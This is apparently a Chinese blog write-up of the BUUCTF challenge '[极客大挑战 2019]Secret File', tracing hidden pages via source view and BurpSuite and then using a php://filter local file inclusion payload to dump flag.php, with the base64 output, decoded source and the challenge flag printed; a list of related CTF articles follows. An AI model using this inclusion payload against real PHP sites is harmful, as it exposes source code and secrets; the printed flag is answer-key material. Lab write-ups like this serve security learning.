BUUCTF之[极客大挑战 2019]Secret File--------文件包含和密码文件

2023-10-23 19:20

本文主要是介绍BUUCTF之[极客大挑战 2019]Secret File--------文件包含和密码文件,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

  BUUCTF之[极客大挑战 2019]Secret File--------文件包含和密码文件
启动我们的项目,看到挑战的页面
在这里插入图片描述
右键查看网页的源代码
在这里插入图片描述

  看到一个可疑的链接,我们访问它:./Archive_room.php。然后出现以下新的页面,我们根据提示访问它看看会出现什么…
在这里插入图片描述

  啊啊啊???什么?就没别的提示了吗?
在这里插入图片描述

  不急,我们看看源代码。好吧源代码什么也没有。但是根据上一个页面的提示:**没看清楚?回去再仔细看看吧。**这句话很可疑,是不是提示我们说那里有个重定向,导致页面跳转的太快所以我看不到!所以我们这里用BurpSuite抓包看看!
在这里插入图片描述

  Bingo!我们抓到重要的提示了。我们访问./secr3t.php 这个页面看看
在这里插入图片描述

  这里提示我们flag在./flag.php这个页面。我们继续访问它看看!!!
在这里插入图片描述

  我们成功访问到这个页面了,但是这里根本就没有flag.php。提示也没有…但是我又想到之前做CTF题的经验,觉得它有可能把flag藏在了浏览器那里!
  所以我们返回到浏览器访问./flag.php这个页面,然后再按F12看看有没有什么信息!(在查看器那里看代码)
在这里插入图片描述

  还是不行,不管是看前端的代码,更改字体颜色或者是背景颜色都没有看到flag。继续查看里面的请求头,Cookie信息都没有发现可疑文件~~~
  好吧,实在是找不到办法了。上网看看其它大佬看看他们是怎么做的。然后得到提示说是在secr3t.php这个页面有个文件包含。emmmmmmmmmm…
  所以我们回去用浏览器访问secr3t.php这个页面,然后再用文件包含看看能不能得到flag。
在这里插入图片描述

  呃呃呃,这是!重要的PHP代码,刚刚用BurpSuite抓包的时候没有看到这个。这里确实是提示了文件包含。。。。好吧,原来用访问页面BurpSuite还有这个问题。学到了。。。
  接下来,我们用火狐浏览器的Hackbar,然后再用我经常用到的文件包含代码看看能不能把隐藏的flag.php展示出来:?file=php://filter/read=convert.base64-encode/resource=flag.php
在这里插入图片描述
  把上面的base64的数据复制下来,然后放到BurpSuite下的Decoder下进行解密操作:
PCFET0NUWVBFIGh0bWw+Cgo8aHRtbD4KCiAgICA8aGVhZD4KICAgICAgICA8bWV0YSBjaGFyc2V0PSJ1dGYtOCI+CiAgICAgICAgPHRpdGxlPkZMQUc8L3RpdGxlPgogICAgPC9oZWFkPgoKICAgIDxib2R5IHN0eWxlPSJiYWNrZ3JvdW5kLWNvbG9yOmJsYWNrOyI+PGJyPjxicj48YnI+PGJyPjxicj48YnI+CiAgICAgICAgCiAgICAgICAgPGgxIHN0eWxlPSJmb250LWZhbWlseTp2ZXJkYW5hO2NvbG9yOnJlZDt0ZXh0LWFsaWduOmNlbnRlcjsiPuWViuWTiO+8geS9oOaJvuWIsOaIkeS6hu+8geWPr+aYr+S9oOeci+S4jeWIsOaIkVFBUX5+fjwvaDE+PGJyPjxicj48YnI+CiAgICAgICAgCiAgICAgICAgPHAgc3R5bGU9ImZvbnQtZmFtaWx5OmFyaWFsO2NvbG9yOnJlZDtmb250LXNpemU6MjBweDt0ZXh0LWFsaWduOmNlbnRlcjsiPgogICAgICAgICAgICA8P3BocAogICAgICAgICAgICAgICAgZWNobyAi5oiR5bCx5Zyo6L+Z6YeMIjsKICAgICAgICAgICAgICAgICRmbGFnID0gJ2ZsYWd7M2FlNWMzYzItMmZlOS00ZjU3LTg5MzgtYWQwOTcyNjUxNzNmfSc7CiAgICAgICAgICAgICAgICAkc2VjcmV0ID0gJ2ppQW5nX0x1eXVhbl93NG50c19hX2cxcklmcmkzbmQnCiAgICAgICAgICAgID8+CiAgICAgICAgPC9wPgogICAgPC9ib2R5PgoKPC9odG1sPgo= 解密后得到:
在这里插入图片描述

<head><meta charset="utf-8"><title>FLAG</title>
</head><body style="background-color:black;"><br><br><br><br><br><br><h1 style="font-family:verdana;color:red;text-align:center;">å•Šå“ˆï¼ä½ æ‰¾åˆ°æˆ‘äº†ï¼å¯æ˜¯ä½ çœ‹ä¸åˆ°æˆ‘QAQ~~~</h1><br><br><br><p style="font-family:arial;color:red;font-size:20px;text-align:center;"><?phpecho "我就在这里";$flag = 'flag{3ae5c3c2-2fe9-4f57-8938-ad097265173f}';$secret = 'jiAng_Luyuan_w4nts_a_g1rIfri3nd'?></p>
</body>

Bingo,可以看到我们的flag啦!我们把它复制下来然后提交可以了!
Flag:flag{3ae5c3c2-2fe9-4f57-8938-ad097265173f}

这篇关于BUUCTF之[极客大挑战 2019]Secret File--------文件包含和密码文件的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/269953

相关文章

跨国公司撤出在华研发中心的启示:中国IT产业的挑战与机遇

近日,IBM中国宣布撤出在华的两大研发中心,这一决定在IT行业引发了广泛的讨论和关注。跨国公司在华研发中心的撤出,不仅对众多IT从业者的职业发展带来了直接的冲击,也引发了人们对全球化背景下中国IT产业竞争力和未来发展方向的深思。面对这一突如其来的变化,我们应如何看待跨国公司的决策?中国IT人才又该如何应对?中国IT产业将何去何从?本文将围绕这些问题展开探讨。 跨国公司撤出的背景与

90、k8s之secret+configMap

一、secret配置管理 配置管理: 加密配置:保存密码,token,其他敏感信息的k8s资源 应用配置:我们需要定制化的给应用进行配置,我们需要把定制好的配置文件同步到pod当中容器 1.1、加密配置: secret: [root@master01 ~]# kubectl get secrets ##查看加密配置[root@master01 ~]# kubectl get se

BUUCTF靶场[web][极客大挑战 2019]Http、[HCTF 2018]admin

目录   [web][极客大挑战 2019]Http 考点:Referer协议、UA协议、X-Forwarded-For协议 [web][HCTF 2018]admin 考点:弱密码字典爆破 四种方法:   [web][极客大挑战 2019]Http 考点:Referer协议、UA协议、X-Forwarded-For协议 访问环境 老规矩,我们先查看源代码

BUUCTF(34)特殊的 BASE64

使用pycharm时,如果想把代码撤销到之前的状态可以用 Ctrl+z 如果不小心撤销多了,可以用 Ctrl+Shift+Z 还原, 别傻傻的重新敲了 BUUCTF在线评测 (buuoj.cn) 查看字符串,想到base64的变表 这里用的c++的标准程序库中的string,头文件是#include<string> 这是base64的加密函数 std::string

国产游戏行业的崛起与挑战:技术创新引领未来

国产游戏行业的崛起与挑战:技术创新引领未来 近年来,国产游戏行业蓬勃发展,技术水平不断提升,许多优秀作品在国际市场上崭露头角。从画面渲染到物理引擎,从AI技术到服务器架构,国产游戏已实现质的飞跃。然而,面对全球游戏市场的激烈竞争,国产游戏技术仍然面临诸多挑战。本文将探讨这些挑战,并展望未来的机遇,深入分析IT技术的创新将如何推动行业发展。 国产游戏技术现状 国产游戏在画面渲染、物理引擎、AI

Open a folder or workspace... (File -> Open Folder)

问题:vscode Open with Live Server 时 显示Open a folder or workspace... (File -> Open Folder)报错 解决:不可以单独打开文件1.html ; 需要在文件夹里打开 像这样

android java.io.IOException: open failed: ENOENT (No such file or directory)-api23+权限受权

问题描述 在安卓上,清单明明已经受权了读写文件权限,但偏偏就是创建不了目录和文件 调用mkdirs()总是返回false. <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/><uses-permission android:name="android.permission.READ_E

bash: arm-linux-gcc: No such file or directory

ubuntu出故障重装了系统,一直用着的gcc使用不了,提示bash: arm-linux-gcc: No such file or directorywhich找到的命令所在的目录 在google上翻了一阵发现此类问题的帖子不多,后来在Freescale的的LTIB环境配置文档中发现有这么一段:     # Packages required for 64-bit Ubuntu

编译linux内核出现 arm-eabi-gcc: error: : No such file or directory

external/e2fsprogs/lib/ext2fs/tdb.c:673:29: warning: comparison between : In function 'max2165_set_params': -。。。。。。。。。。。。。。。。。。 。。。。。。。。。。。。。 。。。。。。。。 host asm: libdvm <= dalvik/vm/mterp/out/Inte

【CTF Web】BUUCTF Upload-Labs-Linux Pass-13 Writeup(文件上传+PHP+文件包含漏洞+PNG图片马)

Upload-Labs-Linux 1 点击部署靶机。 简介 upload-labs是一个使用php语言编写的,专门收集渗透测试和CTF中遇到的各种上传漏洞的靶场。旨在帮助大家对上传漏洞有一个全面的了解。目前一共20关,每一关都包含着不同上传方式。 注意 1.每一关没有固定的通关方法,大家不要自限思维! 2.本项目提供的writeup只是起一个参考作用,希望大家可以分享出自己的通关思路